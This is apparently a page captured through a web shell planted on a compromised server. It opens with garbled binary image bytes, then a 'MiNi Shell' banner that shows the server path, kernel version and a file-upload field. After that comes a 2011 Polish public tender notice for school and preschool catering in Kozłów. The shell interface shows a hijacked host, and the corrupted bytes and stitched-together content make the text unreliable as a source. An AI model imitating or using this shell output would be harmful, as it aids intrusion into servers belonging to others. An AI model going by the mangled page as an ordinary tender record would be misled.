JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111221/434004-N-2011.html

<p class="kh_header"><b>Kozłów: Usługa cateringu - przygotowanie i dostawa posiłków do
Szkoły Podstawowej Nr 1 w Kozłowie i  punktu
przedszkolnego  w Kamionce</b><br>
<b>Numer ogłoszenia: 434004 - 2011; data zamieszczenia: 21.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szkoła Podstawowa Nr 1 w Kozłowie , Kozłów 303, 32-241 Kozłów, woj. małopolskie, tel. 41 38 41 048 w. 36, 696 064 49, faks 41 38 41 010.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.kozlow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa cateringu - przygotowanie i dostawa posiłków do
Szkoły Podstawowej Nr 1 w Kozłowie i  punktu
przedszkolnego  w Kamionce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Usługa cateringu - przygotowanie i dostawa posiłków do Szkoły Podstawowej Nr 1 w Kozłowie i  punktu przedszkolnego  w Kamionce
2. Zamawiający dopuszcza składanie ofert częściowych, gdzie część (zadanie) stanowi:
CZĘŚĆ I
Usługa cateringu - przygotowanie i dostawa posiłków do Szkoły Podstawowej Nr 1 w Kozłowie

1) Liczba dzieci korzystających z obiadów - 50
2) Posiłki mają być przygotowane zgodnie z zalecanymi normami żywieniowymi dla grup
wiekowych dzieci szkolnych, określonymi w ustawie z dnia 25 sierpnia 2006 r. o
bezpieczeństwie żywności i żywienia (Dz. U. nr 171, poz. 1225 z późn. zm.).
3) Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o najwyższym
standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami
HACCP.
4) Porcja dzienna dostarczana przez Wykonawcę składać się będzie z jednego  posiłku dwudaniowego, tj. obiadu
5)Obiad  dostarczany będzie  w godzinach od  11:00 do  12:00
6) Proponowane menu oczekiwane przez Zamawiającego powinno obejmować następujące
pozycje:
zupa (np. jęczmienna, rosół, pomidorowa, ogórkowa);
ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.)
dania mięsne np. sztuka mięsa, udziec kurczaka, kotlet schabowy, stek z piersi z kurczaka, bitki wołowe, gulasz itp. Ryba, pierogi, naleśniki, knedle itp.
surówka, kompot lub napój. 

7) Wskazane menu stanowi jedynie otwarty katalog proponowanych posiłków i może zostać
poszerzone o dodatkowe pozycje w uzgodnieniu pomiędzy Zamawiającym i Wykonawcą.
Wykonawca może zaoferować odmienne menu, lecz o równoważnej wartości
energetycznej poszczególnych składników. Wykonawca zapewni urozmaicony jadłospis
(posiłki nie powinny powtarzać się w ciągu 1 tygodnia).
8) Ilość posiłków w danym miesiącu będzie zależna od ilości  dzieci dożywianych w ramach programu dożywianie oraz od ilości dzieci,  które zadeklarują chęć korzystania z obiadów odpłatnie zgodnie z zamówieniem składanym na piśmie przez rodzica.
9) Zamawiający zastrzega, iż liczba dzieci zdeklarowanych na dany miesiąc może ulec
zmianie w sytuacjach, których zamawiający nie mógł przewidzieć np.: z powodu choroby
dziecka.
10)W kwestii Wykonawcy jest również zapewnienie osoby do wydawania posiłków .
11)Posiłki muszą być dostarczone w naczyniach jednorazowych. Wykonawca zapewni odpowiednią ilość sztućcy jednorazowych.                                                                                                                                                  Posiłki powinny być przewożone w pojemnikach gastronomicznych zapewniających
utrzymanie temperatury spożywania potraw oraz posiadających odpowiednie atesty
Państwowego Zakładu Higieny, Zakładu Badania Żywności i Przedmiotów Użytku.
12)  Do obowiązków Wykonawcy należy także codzienny odbiór pojemników i odpadów pokonsumpcyjnych , jak również zużytych sztućców i naczyń niezależnie od ich ilości. 
13)Posiłki Wykonawca dostarczał będzie własnym transportem. Transport posiłków powinien być prowadzony samochodami dostosowanymi do przewożenia środków spożywczych. Środek transportu winien być dopuszczony przez SANEPID do przewozu posiłków.
14)Jadłospis układany będzie przez Wykonawcę na okres 10 dni i dostarczany
Zamawiającemu do wcześniejszego zatwierdzenia; wszelkie zmiany w jadłospisie
sugerowane przez Zamawiającego będą wiążące dla Wykonawcy.
15) Informacja o ilości posiłków w danym dniu będzie przekazywana w formie elektronicznej (e-mail) lub telefonicznej  przez  Zamawiającego. 






CZĘŚĆ II
Usługa cateringu - przygotowanie i dostawa posiłków do punktu przedszkolnego  w Kamionce
1) Liczba dzieci w punkcie przedszkolnym w Kamionce - 25
2) Posiłki mają być przygotowane zgodnie z zalecanymi normami żywieniowymi dla grup
wiekowych dzieci przedszkolnych, określonymi w ustawie z dnia 25 sierpnia 2006 r. o
bezpieczeństwie żywności i żywienia (Dz. U. nr 171, poz. 1225 z późn. zm.).
3) Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o najwyższym
standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami
HACCP.
4) Porcje dzienne dostarczane przez Wykonawcę składać się będą z dwóch  posiłków, tj.
śniadania, obiadu (2 dania) 
5) Posiłki dostarczane będą w godzinach:
śniadanie: godz. 8:00 - 8:30
obiad : godz. 11:00 - 12:00
6) Proponowane menu oczekiwane przez Zamawiającego powinno obejmować następujące
pozycje:
a) śniadanie:
parówka, bułka weka, herbata;
kanapka z wędliną, herbata;
kanapka z serem białym, jajko, herbata;
kanapka z serem żółtym, herbata;
płatki na mleku;
jajecznica,
b) obiad:
zupa (np. jęczmienna, rosół, pomidorowa, ogórkowa);
ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.)
dania mięsne np. sztuka mięsa, udziec kurczaka, kotlet schabowy, stek z piersi z kurczaka, bitki wołowe, gulasz itp. Ryba, pierogi, naleśniki, knedle itp.
surówka, kompot lub napój. 

7) Wskazane menu stanowi jedynie otwarty katalog proponowanych posiłków i może zostać
poszerzone o dodatkowe pozycje w uzgodnieniu pomiędzy Zamawiającym i Wykonawcą.
Wykonawca może zaoferować odmienne menu, lecz o równoważnej wartości
energetycznej poszczególnych składników. Wykonawca zapewni urozmaicony jadłospis
(posiłki nie powinny powtarzać się w ciągu 1 tygodnia).
8) Ilość posiłków w danym miesiącu będzie zależna od ilości kart dzieci przyjętych do
przedszkola zgodnie z zamówieniem składanym na piśmie
9) Zamawiający zastrzega, iż liczba dzieci zdeklarowanych na dany miesiąc może ulec
zmianie w sytuacjach, których zamawiający nie mógł przewidzieć np.: z powodu choroby
dziecka.
10)W kwestii Wykonawcy jest również dostarczenie wyparzacza,  naczyń oraz sztućców 
wielokrotnego użytku, na których będą wydawane posiłki oraz zapewnienie osoby do wydawania posiłków. Wyparzacz Wykonawca zabierze po zakończeniu trwania umowy. Wykonawca zobowiązany jest do  odbieranie  resztek jedzenia .
11)Posiłki powinny być przewożone w termosach gastronomicznych zapewniających
utrzymanie temperatury spożywania potraw oraz posiadających odpowiednie atesty
Państwowego Zakładu Higieny, Zakładu Badania Żywności i Przedmiotów Użytku.
12)Wszystkie etapy procesu produkcyjnego, łącznie z napełnianiem posiłkami termosów
powinny przebiegać bez zbędnych przestojów, celem zabezpieczenia przed
zanieczyszczeniem, zepsuciem i rozwojem drobnoustrojów chorobotwórczych.
13)Posiłki Wykonawca dostarczał będzie własnym transportem. Transport posiłków powinien być prowadzony samochodami dostosowanymi do przewożenia środków spożywczych. Środek transportu winien być dopuszczony przez SANEPID do przewozu posiłków.
14)Jadłospis układany będzie przez Wykonawcę na okres 10 dni i dostarczany
Zamawiającemu do wcześniejszego zatwierdzenia; wszelkie zmiany w jadłospisie
sugerowane przez Zamawiającego będą wiążące dla Wykonawcy.
15) Informacja o ilości posiłków w danym dniu będzie przekazywana w formie elektronicznej (e-mail) lub telefonicznej  przez Zamawiającego..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.08.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w
postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów metodą spełnia/nie spełnia. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że w okresie ostatnich 3 lat przed upływem terminu składania
ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie wykonał co
najmniej jedną dostawę odpowiadająca rodzajem przedmiotowi zamówienia, której wartość
jest nie mniejsza niż 75 000,00zł
Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w
postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów metodą spełnia/nie spełnia. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w
postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów metodą spełnia/nie spełnia. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający dokona oceny spełniania przez Wykonawców warunków udziału w
postępowaniu na podstawie złożonych w ofercie oświadczeń i dokumentów metodą spełnia/nie spełnia. Wykonawcy nie spełniający warunków zostaną wykluczeni z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Decyzja właściwego Inspektora Sanitarnego stwierdzająca, że Wykonawca spełnia wymagania dotyczące produkcji oraz dystrybucji posiłków</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.kozlow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zespół Ekonomiczno - Administracyjny Szkół w Kozłowie
Księgowość szkoły
Kozłów 60
32-241 Kozłów.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 09:00, miejsce: Zespół Ekonomiczno - Administracyjny Szkół w Kozłowie
Kozłów 60
32-241 Kozłów.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa cateringu - przygotowanie i dostawa posiłków do Szkoły Podstawowej Nr 1 w Kozłowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba dzieci korzystających z obiadów - 50
2) Posiłki mają być przygotowane zgodnie z zalecanymi normami żywieniowymi dla grup
wiekowych dzieci szkolnych, określonymi w ustawie z dnia 25 sierpnia 2006 r. o
bezpieczeństwie żywności i żywienia (Dz. U. nr 171, poz. 1225 z późn. zm.).
3) Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o najwyższym
standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami
HACCP.
4) Porcja dzienna dostarczana przez Wykonawcę składać się będzie z jednego  posiłku dwudaniowego, tj. obiadu
5)Obiad  dostarczany będzie  w godzinach od  11:00 do  12:00
6) Proponowane menu oczekiwane przez Zamawiającego powinno obejmować następujące
pozycje:
zupa (np. jęczmienna, rosół, pomidorowa, ogórkowa);
ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.)
dania mięsne np. sztuka mięsa, udziec kurczaka, kotlet schabowy, stek z piersi z kurczaka, bitki wołowe, gulasz itp. Ryba, pierogi, naleśniki, knedle itp.
surówka, kompot lub napój. 

7) Wskazane menu stanowi jedynie otwarty katalog proponowanych posiłków i może zostać
poszerzone o dodatkowe pozycje w uzgodnieniu pomiędzy Zamawiającym i Wykonawcą.
Wykonawca może zaoferować odmienne menu, lecz o równoważnej wartości
energetycznej poszczególnych składników. Wykonawca zapewni urozmaicony jadłospis
(posiłki nie powinny powtarzać się w ciągu 1 tygodnia).
8) Ilość posiłków w danym miesiącu będzie zależna od ilości  dzieci dożywianych w ramach programu dożywianie oraz od ilości dzieci,  które zadeklarują chęć korzystania z obiadów odpłatnie zgodnie z zamówieniem składanym na piśmie przez rodzica.
9) Zamawiający zastrzega, iż liczba dzieci zdeklarowanych na dany miesiąc może ulec
zmianie w sytuacjach, których zamawiający nie mógł przewidzieć np.: z powodu choroby
dziecka.
10)W kwestii Wykonawcy jest również zapewnienie osoby do wydawania posiłków .
11)Posiłki muszą być dostarczone w naczyniach jednorazowych. Wykonawca zapewni odpowiednią ilość sztućcy jednorazowych.                                                                                                                                                  Posiłki powinny być przewożone w pojemnikach gastronomicznych zapewniających
utrzymanie temperatury spożywania potraw oraz posiadających odpowiednie atesty
Państwowego Zakładu Higieny, Zakładu Badania Żywności i Przedmiotów Użytku.
12)  Do obowiązków Wykonawcy należy także codzienny odbiór pojemników i odpadów pokonsumpcyjnych , jak również zużytych sztućców i naczyń niezależnie od ich ilości. 
13)Posiłki Wykonawca dostarczał będzie własnym transportem. Transport posiłków powinien być prowadzony samochodami dostosowanymi do przewożenia środków spożywczych. Środek transportu winien być dopuszczony przez SANEPID do przewozu posiłków.
14)Jadłospis układany będzie przez Wykonawcę na okres 10 dni i dostarczany
Zamawiającemu do wcześniejszego zatwierdzenia; wszelkie zmiany w jadłospisie
sugerowane przez Zamawiającego będą wiążące dla Wykonawcy.
15) Informacja o ilości posiłków w danym dniu będzie przekazywana w formie elektronicznej (e-mail) lub telefonicznej  przez  Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa cateringu - przygotowanie i dostawa posiłków do punktu przedszkolnego  w Kamionce.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Liczba dzieci w punkcie przedszkolnym w Kamionce - 25
2) Posiłki mają być przygotowane zgodnie z zalecanymi normami żywieniowymi dla grup
wiekowych dzieci przedszkolnych, określonymi w ustawie z dnia 25 sierpnia 2006 r. o
bezpieczeństwie żywności i żywienia (Dz. U. nr 171, poz. 1225 z późn. zm.).
3) Wykonawca zobowiązany jest do przygotowania i dostarczenia posiłków o najwyższym
standardzie, na bazie produktów najwyższej jakości i bezpieczeństwa zgodnie z normami
HACCP.
4) Porcje dzienne dostarczane przez Wykonawcę składać się będą z dwóch  posiłków, tj.
śniadania, obiadu (2 dania) 
5) Posiłki dostarczane będą w godzinach:
śniadanie: godz. 8:00 - 8:30
obiad : godz. 11:00 - 12:00
6) Proponowane menu oczekiwane przez Zamawiającego powinno obejmować następujące
pozycje:
a) śniadanie:
parówka, bułka weka, herbata;
kanapka z wędliną, herbata;
kanapka z serem białym, jajko, herbata;
kanapka z serem żółtym, herbata;
płatki na mleku;
jajecznica,
b) obiad:
zupa (np. jęczmienna, rosół, pomidorowa, ogórkowa);
ziemniaki (lub zamiennie ryż, kasza, kopytka, makaron itp.)
dania mięsne np. sztuka mięsa, udziec kurczaka, kotlet schabowy, stek z piersi z kurczaka, bitki wołowe, gulasz itp. Ryba, pierogi, naleśniki, knedle itp.
surówka, kompot lub napój. 

7) Wskazane menu stanowi jedynie otwarty katalog proponowanych posiłków i może zostać
poszerzone o dodatkowe pozycje w uzgodnieniu pomiędzy Zamawiającym i Wykonawcą.
Wykonawca może zaoferować odmienne menu, lecz o równoważnej wartości
energetycznej poszczególnych składników. Wykonawca zapewni urozmaicony jadłospis
(posiłki nie powinny powtarzać się w ciągu 1 tygodnia).
8) Ilość posiłków w danym miesiącu będzie zależna od ilości kart dzieci przyjętych do
przedszkola zgodnie z zamówieniem składanym na piśmie
9) Zamawiający zastrzega, iż liczba dzieci zdeklarowanych na dany miesiąc może ulec
zmianie w sytuacjach, których zamawiający nie mógł przewidzieć np.: z powodu choroby
dziecka.
10)W kwestii Wykonawcy jest również dostarczenie wyparzacza,  naczyń oraz sztućców 
wielokrotnego użytku, na których będą wydawane posiłki oraz zapewnienie osoby do wydawania posiłków. Wyparzacz Wykonawca zabierze po zakończeniu trwania umowy. Wykonawca zobowiązany jest do  odbieranie  resztek jedzenia .
11)Posiłki powinny być przewożone w termosach gastronomicznych zapewniających
utrzymanie temperatury spożywania potraw oraz posiadających odpowiednie atesty
Państwowego Zakładu Higieny, Zakładu Badania Żywności i Przedmiotów Użytku.
12)Wszystkie etapy procesu produkcyjnego, łącznie z napełnianiem posiłkami termosów
powinny przebiegać bez zbędnych przestojów, celem zabezpieczenia przed
zanieczyszczeniem, zepsuciem i rozwojem drobnoustrojów chorobotwórczych.
13)Posiłki Wykonawca dostarczał będzie własnym transportem. Transport posiłków powinien być prowadzony samochodami dostosowanymi do przewożenia środków spożywczych. Środek transportu winien być dopuszczony przez SANEPID do przewozu posiłków.
14)Jadłospis układany będzie przez Wykonawcę na okres 10 dni i dostarczany
Zamawiającemu do wcześniejszego zatwierdzenia; wszelkie zmiany w jadłospisie
sugerowane przez Zamawiającego będą wiążące dla Wykonawcy.
15) Informacja o ilości posiłków w danym dniu będzie przekazywana w formie elektronicznej (e-mail) lub telefonicznej  przez Zamawiającego..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.52.40.00-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.08.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

